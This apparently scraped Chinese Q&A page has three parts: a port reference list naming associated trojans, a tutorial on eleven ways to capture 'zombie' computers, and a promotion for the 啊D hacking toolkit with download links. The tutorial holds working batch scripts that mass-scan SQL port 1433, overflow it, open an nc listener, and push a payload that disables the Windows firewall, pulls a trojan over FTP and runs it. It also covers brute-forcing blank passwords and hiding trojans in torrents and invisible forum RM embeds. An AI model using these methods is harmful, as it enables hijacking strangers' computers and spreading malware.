說明:Microsoft在這個埠運行DCE RPC end-point mapper為它的DCOM服務。這與UNIX 111埠的功能很相似。使用DCOM和RPC的服務利用計算機上的end-point mapper注冊它們的位置。遠端客戶連接到計算機時,它們查找end-point mapper找到服務的位置。HACKER掃描計算機的這個埠是為了找到這個計算機上運行Exchange Server嗎?什麼版本?還有些DOS攻擊直接針對這個埠。

埠:137、138、139
服務:NETBIOS Name Service
說明:其中137、138是UDP埠,當通過網上鄰居傳輸文件時用這個埠。而139埠:通過這個埠進入的連接試圖獲得NetBIOS/SMB服務。這個協議被用於windows文件和列印機共享和SAMBA。還有WINS Regisrtation也用它。

埠:143
服務:Interim Mail Access Protocol v2
說明:和POP3的安全問題一樣,許多IMAP伺服器存在有緩沖區溢出漏洞。記住:一種LINUX蠕蟲(admv0rm)會通過這個埠繁殖,因此許多這個埠的掃描來自不知情的已經被感染的用戶。當REDHAT在他們的LINUX發布版本中默認允許IMAP後,這些漏洞變的很流行。這一埠還被用於IMAP2,但並不流行。

埠:161
服務:SNMP
說明:SNMP允許遠程管理設備。所有配置和運行信息的儲存在資料庫中,通過SNMP可獲得這些信息。許多管理員的錯誤配置將被暴露在Internet。Cackers將試圖使用默認的密碼public、private訪問系統。他們可能會試驗所有可能的組合。SNMP包可能會被錯誤的指向用戶的網路。

埠:177
服務:X Display Manager Control Protocol
說明:許多入侵者通過它訪問X-windows操作台,它同時需要打開6000埠。

埠:389
服務:LDAP、ILS
說明:輕型目錄訪問協議和NetMeeting Internet Locator Server共用這一埠。

埠:443
服務:Https
說明:網頁瀏覽埠,能提供加密和通過安全埠傳輸的另一種HTTP。

埠:456
服務:[NULL]
說明:木馬HACKERS PARADISE開放此埠。

埠:513
服務:Login,remote login
說明:是從使用cable modem或DSL登陸到子網中的UNIX計算機發出的廣播。這些人為入侵者進入他們的系統提供了信息。

埠:544
服務:[NULL]
說明:kerberos kshell

埠:548
服務:Macintosh,File Services(AFP/IP)
說明:Macintosh,文件服務。

埠:553
服務:CORBA IIOP (UDP)
說明:使用cable modem、DSL或VLAN將會看到這個埠的廣播。CORBA是一種面向對象的RPC系統。入侵者可以利用這些信息進入系統。

埠:555
服務:DSF
說明:木馬PhAse1.0、Stealth Spy、IniKiller開放此埠。

埠:568
服務:Membership DPA
說明:成員資格 DPA。

埠:569
服務:Membership MSN
說明:成員資格 MSN。

埠:635
服務:mountd
說明:Linux的mountd Bug。這是掃描的一個流行BUG。大多數對這個埠的掃描是基於UDP的,但是基於TCP的mountd有所增加(mountd同時運行於兩個埠)。記住mountd可運行於任何埠(到底是哪個埠,需要在埠111做portmap查詢),只是Linux默認埠是635,就像NFS通常運行於2049埠。

埠:636
服務:LDAP
說明:SSL(Secure Sockets layer)

埠:666
服務:Doom Id Software
說明:木馬Attack FTP、Satanz Backdoor開放此埠

埠:993
服務:IMAP
說明:SSL(Secure Sockets layer)

埠:1001、1011
服務:[NULL]
說明:木馬Silencer、WebEx開放1001埠。木馬Doly Trojan開放1011埠。

埠:1024
服務:Reserved
說明:它是動態埠的開始,許多程序並不在乎用哪個埠連接網路,它們請求系統為它們分配下一個閑置埠。基於這一點分配從埠1024開始。這就是說第一個向系統發出請求的會分配到1024埠。你可以重啟機器,打開Telnet,再打開一個窗口運行natstat -a 將會看到Telnet被分配1024埠。還有SQL session也用此埠和5000埠。

埠:1025、1033
服務:1025:network blackjack 1033:[NULL]
說明:木馬netspy開放這2個埠。

埠:1080
服務:SOCKS
說明:這一協議以通道方式穿過防火牆,允許防火牆後面的人通過一個IP地址訪問INTERNET。理論上它應該只允許內部的通信向外到達INTERNET。但是由於錯誤的配置,它會允許位於防火牆外部的攻擊穿過防火牆。WinGate常會發生這種錯誤,在加入IRC聊天室時常會看到這種情況。

埠:1170
服務:[NULL]
說明:木馬Streaming Audio Trojan、Psyber Stream Server、Voice開放此埠。

埠:1234、1243、6711、6776
服務:[NULL]
說明:木馬SubSeven2.0、Ultors Trojan開放1234、6776埠。木馬SubSeven1.0/1.9開放1243、6711、6776埠。

埠:1245
服務:[NULL]
說明:木馬Vodoo開放此埠。

埠:1433
服務:SQL
說明:Microsoft的SQL服務開放的埠。

埠:1492
服務:stone-design-1
說明:木馬FTP99CMP開放此埠。

埠:1500
服務:RPC client fixed port session queries
說明:RPC客戶固定埠會話查詢

埠:1503
服務:NetMeeting T.120
說明:NetMeeting T.120

埠:1524
服務:ingress
說明:許多攻擊腳本將安裝一個後門SHELL於這個埠,尤其是針對SUN系統中Sendmail和RPC服務漏洞的腳本。如果剛安裝了防火牆就看到在這個埠上的連接企圖,很可能是上述原因。可以試試Telnet到用戶的計算機上的這個埠,看看它是否會給你一個SHELL。連接到600/pcserver也存在這個問題。

埠:1600
服務:issd
說明:木馬Shivka-Burka開放此埠。

埠:1720
服務:NetMeeting
說明:NetMeeting H.233 call Setup。

埠:1731
服務:NetMeeting Audio Call Control
說明:NetMeeting音頻調用控制。

埠:1807
服務:[NULL]
說明:木馬SpySender開放此埠。

埠:1981
服務:[NULL]
說明:木馬ShockRave開放此埠。

埠:1999
服務:cisco identification port
說明:木馬BackDoor開放此埠。

埠:2000
服務:[NULL]
說明:木馬GirlFriend 1.3、Millenium 1.0開放此埠。

埠:2001
服務:[NULL]
說明:木馬Millenium 1.0、Trojan Cow開放此埠。

埠:2023
服務:xinuexpansion 4
說明:木馬Pass Ripper開放此埠。

埠:2049
服務:NFS
說明:NFS程序常運行於這個埠。通常需要訪問Portmapper查詢這個服務運行於哪個埠。

埠:2115
服務:[NULL]
說明:木馬Bugs開放此埠。

埠:2140、3150
服務:[NULL]
說明:木馬Deep Throat 1.0/3.0開放此埠。

埠:2500
服務:RPC client using a fixed port session replication
說明:應用固定埠會話復制的RPC客戶

9. 怎麼學抓肉雞

抓肉雞的11種方法
首先得准備,免殺的STAT 或 一隻免殺鴿子或者其他的遠控,一個免費空間,一些工具(下面會提到)
(1)
掃3389埠抓肉雞
(適合新手)(抓不了國外肉雞)
現在國內網路上流傳著一種克隆版的XP,安裝後會默認開啟一個賬號為new,密碼為空的賬戶,而且基本上都是開著3389的,我們就可以利用這一點來抓肉雞。首先用埠掃描工具(如S掃)掃一段IP的3389埠,掃完後就直接用遠程桌面連接開放3389的機器(也可以把結果保存為文本文件,用批量生成3389連接的工具來連接),然後輸入賬號new登入,如果別人的電腦前沒人的話你就可以去你的空間下載你傳好的木馬安裝拉~~這種方法只針XP系統,如果遇到2000或者2003系統就不要試了呵呵。缺點也很明顯,如果別人不是用new賬號登入XP的,你再登入上去就會把他擠出去(XP只支持單用戶登入,用戶登入需要用工具開),或者電腦前有人你就不可能去打開IE下載木馬了。
(2)
掃135埠抓肉雞
首先先用埠掃描器掃一段IP的135埠,然後把結果保存,再用NTSCAN過濾有弱口令的機器,最後用recton開telnet傳馬。因為現在135和445埠都被防火牆屏蔽了,只能掃本地的135肉雞,要抓外地的只能用外地的135肉雞來掃。(詳細動畫可以去黑客網站搜索135)
(3)
掃445埠抓肉雞
和掃135抓肉雞差不多,首先先用埠掃描器掃一段IP的445埠,然後把結果保存,再用NTSCAN過濾有弱口令的機器,最後用啊D工具包開共享傳馬。因為現在135和445埠都被防火牆屏蔽了,只能掃本地的445肉雞,要抓外地的只能用外地的445肉雞來掃。(詳細動畫可以去黑客網站搜索445)
(4)
1433埠批量溢出抓肉雞
這個方法可以實現全自動抓雞
要用到的工具:S掃 sqlhello.exe nc.exe批處理文件
首先先寫個批處理,打開記事本,把以下代碼復制修改後,儲存為掃描+溢出.bat文件
@echo off
for /f \"eol=; tokens=1,2 delims= \" %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
@echo off
for /f \"eol=; tokens=1 delims= \" %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556
還要新建一個tt.txt,裡面你要掃的IP段,格式為XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中間是空格
1433是要掃描的埠,1000是掃描線程數 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 這個里的XXX添你的IP,556是後面NC監聽的埠
然後再寫個批處理
@echo off
Nc -l -vv -p 556<nc.txt&&%0 這里的556要和上面的保持一致,你也可以改成其他的值,但是2處都要改,然後保存為nc.bat
然後再新建一個nc.txt,裡面填寫溢出成功後讓肉雞下載你木馬的代碼。
這里給出一種代碼
echo open X.X.X.X(你FTP的IP)>>daima.txt
echo username>>daima.txt
echo password>>daima.txt
echo bin>>daima.txt(以2進制傳輸數據)
echo get xxx.exe(你的木馬的文件名,要放在根目錄下)>>daima.txt
echo bye>>daima.txt
net stop sharedaccess(關閉WINDOWS自帶防火牆)
ftp -s:daima.txt
xxx.exe(也是填你木馬的文件名)
del daima.txt
注意上面的代碼回車符別刪掉,要不然就沒法下你的馬了。
上面的步驟都搞好後,就可以開始掃肉雞了。
先打開多個NC.bat,然後再打開掃描+溢出.bat,然後你就可以去睡大覺了。自動掃描,掃描完後自動溢出,溢出後還自動下馬執行,爽吧!所以這里講詳細點,呵呵。還有42 21埠也可以這樣溢出,只要用這些埠的溢出工具就好了,詳細動畫可以去黑客網站搜索1433。
忘了說,上面的工具和批處理什麼的都要放在同一個文件夾下。
先休息一下,打這么多字累死了
繼續
(5)
掃1433抓肉雞之方法2
要用到的工具:埠掃描器 X-scanSQL綜合利用工具
上面我們說過了,1433溢出現在成功率已經不高了,所以我們可以用另一種方法。
開了1433埠的機器一般都裝了SQL,所以我們可以猜測SQL弱口令來抓1433肉雞。
首先先用埠掃描器掃一段IP的1433埠,然後結果保存為文本文件,接著用X-scan導入這些開了1433的IP,然後在掃描參數-全局設置-掃描模塊這一欄里只勾上SQL-SERVER就可以了,其他不要勾。然後在插件設置-埠相關設置-待檢測埠這一欄,只填1433埠。然後就可以開始掃描了。掃描完成後會有個報告,列出了有弱口令的機器,然後打開SQL綜合利用工具,輸入你掃到的弱口令來連接,接著打開SQL綜合利用工具-利用目錄,上傳你的木馬,然後在用DOS命令執行你的木馬就OK了。
(6)
用WINNTAutoAttack掃SA弱口令抓肉雞
工具:WINNTAutoAttack SQL綜合利用工具
打開WINNTAutoAttack,找一段IP添上,然後只勾上設置下的僅對PING檢查成功的機器進行檢測和SQL列出密碼為空的SA賬號,接著開始掃描,掃完後,用 SQL綜合利用工具連上傳馬執行就好了。
(7)
掃4899空口令抓肉雞
工具:埠掃描器 4899探測器 Radmin
首先先用埠掃描器掃一段IP的4899埠,然後用4899探測器導入開了4899埠的IP,接著掃空令,最後用Radmin連接有空口令的機器,帶開文件管理,上傳的你木馬運行就OK了。詳細動畫可以去黑客網站搜索4899
(8)
掃5900埠抓VNC肉雞
工具:VNC掃描器 VNC連接器
首先用VNC掃描器掃描一段IP,掃描格式為vscan.exe(掃描器文件名) -i 219.0.0.0-219.255.255.255(掃描IP段) -p 5900 -vnc -vv
掃描完成後會在掃描器所在的同一文件夾生成一個文本文件,打開後有一列IP,IP後面的有一些單詞比如patched,banned,vulnerable,只有單詞為vulnerable才能連接。接著就用VNC連接器連接,下面就不用多說了吧? 詳細動畫可以去黑客網站搜索VNC
接下來說說掛馬抓肉雞吧。方法有很多,比如BT掛馬、免費空間掛馬、迅雷掛馬等等,有些我也還不會,呵呵。下面就介紹幾種我會的。
(9)
BT掛馬
顧名思義,就是把你的木馬發布到BT網站讓人下載。當然如果只把單純的木馬文件發布上去效果肯定不好,而且現在一般的BT網站也不讓發布EXE文件。所以我們需要一些隱藏的手法。我們可以先把木馬用捆綁器和一些電影、音樂、游戲捆綁在一起,再壓縮成RAR文件發布,誰在開始下載時會知道RAR里有木馬呢?當他費了好大勁下載完,打開發現是EXE的格式後,總有些菜鳥會不想辜負自己花費的時間而忍不住打開吧?尤其是下XXX片的時候當然你也可以做個網頁木馬,然後把你網頁木馬的地址插入到你發布的文件中(不是所有文件都可以這樣的,我只知道RM和EXE文件可以插入),別人下載打開後同時也會帶開你的網頁木馬,如果他的系統沒有補供你網頁木馬所利用的漏洞的話,那他就會中你的馬了。有些朋友可能會想,我把木馬和其他文件捆綁後格式保持為那個文件(比如RM捆綁木馬後保持RM格式),那樣別人不就不會懷疑了嗎?呵呵,如果真有這樣的好事那我上面何不說把木馬和BT種子文件綁在一起發布,那樣你肉雞不抓瘋了才怪~~所以在這里說一下,木馬和其他文件捆綁後生成的文件只能為EXE格式的,除非你有你所捆綁文件的格式的溢出漏洞,那樣才能把生成後的文件格式保持為你所捆綁文件的格式。不過這樣的漏洞現在很少,大多都被補了,就算有別人也不一定會公開,為什麼想想就知道了吧。在這里就說一個最近的RAR溢出漏洞,針對winrar3.6版本以下的所有版本,只要你winrar版本低於3.6,運行綁了牧馬的RAR文件後就會中馬。此類木馬症狀為:運行RAR文件後會彈出一個什麼什麼損壞還是錯誤的對話框,然後RAR文件體積變小,減少的體積就為木馬的體積。然後再次打開這個RAR文件一切正常,不會彈出錯誤對話框。在這里提醒下各位趕快更新下WINRAR版本,小心中馬哈。
(10)
免費空間掛馬
其實和BT差不多,就是把做好的木馬上傳到你申請的免費空間,然後到論壇發些誘惑性的帖子讓別人下載你的木馬。優點是不用像BT那樣做種子,那樣不僅要開著電腦,還影響網速。我這幾天就是這樣掛的,弄個免費空間,上傳個木馬,到2個XXX論壇發個帖子,每天睡前一頂,才掛了幾天,現在每天肉雞都保持在40-60隻。而且大部分都是美國的
(11)
用RM在論壇掛馬
首先你弄個只有幾秒鍾的RM文件,然後插入你的網頁木馬,接著上傳到你的空間,然後到一些支持插入RM連接的論壇發帖子,點插入real media 播放器,輸入你的RM牧馬地址,然後高度寬度都設為1(這部是為了保證隱蔽性 ),然後點發貼,這樣別人在瀏覽你的帖子就會運行你的RM木馬,而我們前面把高和寬設為1,在帖子里RM連接就看不到了。這樣別人就不知不覺中了我們的馬了 好像FLASH木馬也可以這樣的,我沒試過,大家可以去研究下。

10. 急求阿D工具包

我的這個是在阿D博客上面下的 ,
http://www.d99net.net/ 裡面全是啊D的軟體,保證沒有捆綁任何木馬!!

本軟體不會收費,將一直免費下去!

老早前修改過一些地方,現在忘了修改過什麼地方了,基本上和2.01差不多!關閉進程的能力加強了!

軟體功能如下:
---------------------------------------------------------------------------------
1. 共享資源查找 [為你查找網上的共享資源!]
2. 肉雞查找 [查找一個網段NT,Win2000密碼過於簡單的主機,還加入了系統版本識別,使用更方便]
3. 遠程服務查看 [你可以查看和修改遠程的服務,如關閉和啟動Telnet,更方便!]
4. 查看隱藏共享 [查看遠程計算機的全部共享,包括隱藏的共享也可以查看的到,查看共享更方便]
5. 查看用戶組信息 [Win介面的查看遠程機子的用戶和組的信息,便用更方便!]
6. 開遠程的Telnet [直截開啟微軟自帶的Telnet,開Telnet,原來也可以這么簡單!]
3. NT消息發送 [向NT的機子發送消息,便用Win介面使用更方便!]
3. IP埠掃描 [有針對性的查看整個網段的某個埠,如冰河埠7626]
4. 埠掃描 [使你更加了解對方主機埠的打開狀況]
5. 網卡MAC [快速獲取一個網段的 用戶名、工作組、對方的網卡MAC地址]
6. 網路狀態查看 [想知道自己機子打開了什麼埠嗎?本程序可幫上你的忙!]
7. 主機查詢 [想知道IP的的所在地?想知道某地有哪些IP,本程序可幫上你的忙!]
8. Ping [判斷某IP是否和網路連接的好幫手!]
9. 域名<=>IP [想知道域名對應的IP,想知道IP對應的域名,本程序可以幫助你!]
10. 路由查看 [想知道某IP經過的路由?用本程序就可以給你答案!]
11. Finger [Finger能為你查詢對方系統的用戶信息!]
12. 進程查看 [查看正在運行的軟體,查木馬還是有一定的幫助的!]
13. 本機IP [在上網的時候,想知道自己的IP嗎?本程序可以為你辦到!]
14. 常用修改 [反惡意網頁修改,恢復系統設置等]
19. 查錯誤代號說明 [不知道51這個代號表示什麼錯誤,查一查就知道了!]
---------------------------------------------------------------------------------

支持的系統:win98/WinMe/win2000/WinXP/WinNT

下載:http://www.xpfox.net/DTools2.02.rar

請注意,啊D網路工具包,已被列入殺毒軟體的病毒庫,所以如果你開了殺毒軟體的話,可能不能用我的軟體! 懷疑有毒或是不放心的朋友,請不要下載軟體!

常見問題
------------------------------------------------------------------------------------------
掃不出肉雞有很多的可能!一般有如下的情況!
1.你系統的防火牆,或某些補丁作怪!
2.有些地方是掃不到肉雞的(是不是和各地的電信有關,暫時還不知道)
3.機子設置有關!
4.掃描的網段沒有肉雞(空IPC的2000機子,其實現在已比較少的了)
5.XP掃描肉雞,是比較難掃到肉雞的(2000和XP的IPC掃描有所不同,軟體中是利用系統自帶的IPC驗證功能,至於XP系統的IPC掃描為什麼會比較難,是和系統有關)
6.有些路由作了掃描限制
7,需要的服務沒開啟,請開啟他,Workstation,Server

閱讀全文

與啊d過濾11相關的資料

熱點內容
神定河污水處理廠 瀏覽:412
什麼凈化器沒酸味 瀏覽:731
被農葯污染的水過濾 瀏覽:615
廢水cod會低於檢測限嗎 瀏覽:372
凈水器壓力桶有多少g 瀏覽:127
外網雨水污水做什麼檢驗批 瀏覽:942
漳州市污水多少萬噸每天 瀏覽:96
哪裡能買到正品凈水器 瀏覽:992
華北現工業污水坑視頻 瀏覽:347
雨污水管可以共溝嗎 瀏覽:862
超濾正洗水量確定 瀏覽:430
樹脂怎樣稠 瀏覽:804
丙烯酸環氧樹脂ab膠 瀏覽:890
浙江農村生活污水處理適用技術 瀏覽:201
反滲透膜清洗水量計算 瀏覽:914
廢水性漆鐵桶多少錢 瀏覽:120
五脊四坡屋頂圖片集樹脂瓦 瀏覽:460
f5濾芯是什麼 瀏覽:884
純水機制水電導率標准值是多少 瀏覽:907
本田凌派如何安裝空調濾芯 瀏覽:108